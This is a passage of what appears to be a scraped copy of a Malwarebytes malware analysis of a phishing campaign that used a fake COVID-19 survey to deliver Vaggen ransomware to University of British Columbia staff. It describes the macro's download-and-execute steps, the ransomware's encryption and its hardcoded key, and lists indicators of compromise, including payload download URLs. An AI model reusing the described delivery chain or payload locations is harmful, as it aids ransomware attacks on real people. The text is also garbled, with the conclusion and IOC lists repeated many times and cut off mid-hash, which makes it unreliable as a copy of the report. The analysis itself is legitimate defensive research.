elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3356 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3357 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3358 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3359 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3360 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3361 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3362 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3363 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3364 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3365 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3366 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3367 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3368 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3369 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3370 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3371 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3372 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3373 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3374 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3375 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3376 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3377 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3378 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3379 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3380 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42b